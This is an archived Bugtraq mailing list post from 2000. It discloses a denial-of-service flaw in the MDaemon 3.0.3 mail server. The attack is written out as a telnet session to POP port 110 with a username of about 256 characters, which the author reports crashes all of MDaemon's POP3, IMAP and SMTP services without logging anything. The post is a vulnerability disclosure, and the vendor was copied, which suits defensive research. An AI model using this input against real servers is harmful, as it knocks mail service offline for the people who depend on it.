Bugtraq mailing list archives

Deerfield Communications MDaemon Mail Server DoS

From: cassius () HUSHMAIL COM (cassius () HUSHMAIL COM)
Date: Wed, 24 May 2000 10:26:29 -0800


Deerfield Communications (the Wingate perpetrators) MDaemon POP server is
vulnerable to bigass usernames causing a DoS.  MDaemon is a mail server
package for 95,98,NT and Win2k.  Many systems that run Deerfield's World
Client web-mail also use MDaemon.

Exploit tested on Win2kpro running MDaemon 3.0.3

telnet example.com 110
+OK example.com POP service ready [1] using MDaemon v3.0.3 R
user ................(x256 more or less but 256 does the trick)
pass b00m!

This kills MDaemon and all of it's servers (POP3, IMAP, SMTP)
Nothing is logged. Event viewer says the service has terminated unexpectedly.
With proper research an overflow attack might be possible but I couldn't
find any access violations.
Vendor has been copied this message.  Not much else to say.

-Cassius

IMPORTANT NOTICE:  If you are not using HushMail, this message could have been read easily by the many people who have 
access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.

Current thread:

Re: fdmount buffer overflow Cami (May 22)
- <Possible follow-ups>
- Re: fdmount buffer overflow Vandoorselaere Yoann (May 23)
  - Deerfield Communications MDaemon Mail Server DoS cassius () HUSHMAIL COM (May 24)
  - Re: fdmount buffer overflow Katherine M. Moussouris (May 24)
- Re: fdmount buffer overflow Chmouel Boudjnah (May 23)
- Re: fdmount buffer overflow Christopher Schulte (May 24)